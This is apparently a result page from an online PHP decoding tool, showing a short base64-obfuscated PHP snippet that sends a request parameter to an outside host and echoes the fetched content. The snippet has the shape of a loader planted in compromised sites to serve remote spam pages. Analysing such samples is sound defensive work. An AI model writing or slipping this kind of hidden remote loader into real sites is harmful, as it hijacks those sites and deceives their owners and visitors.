Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php <?php $f0=base64_decode('aHR0cHM6Ly9jb2Rld2l0aHRlYWNodWIuY29tL21rdi8=');$j1=$_REQUES..

Decoded Output download

<?php <?php $f0=base64_decode('aHR0cHM6Ly9jb2Rld2l0aHRlYWNodWIuY29tL21rdi8=');$j1=$_REQUEST[base64_decode('dHM=')]?? '';if($j1!==''){echo file_get_contents($f0.base64_decode('bWt2LnBocD90cz0=').$j1);}else{echo file_get_contents($f0.base64_decode('c2VydmVyLnBocA=='));}?>

Did this file decode correctly?

Original Code

<?php <?php $f0=base64_decode('aHR0cHM6Ly9jb2Rld2l0aHRlYWNodWIuY29tL21rdi8=');$j1=$_REQUEST[base64_decode('dHM=')]?? '';if($j1!==''){echo file_get_contents($f0.base64_decode('bWt2LnBocD90cz0=').$j1);}else{echo file_get_contents($f0.base64_decode('c2VydmVyLnBocA=='));}?>

Function Calls

None

Variables

None

Stats

MD5 fb5d83bc918505c41358122d7e62a5d2
Eval Count 0
Decode Time 73 ms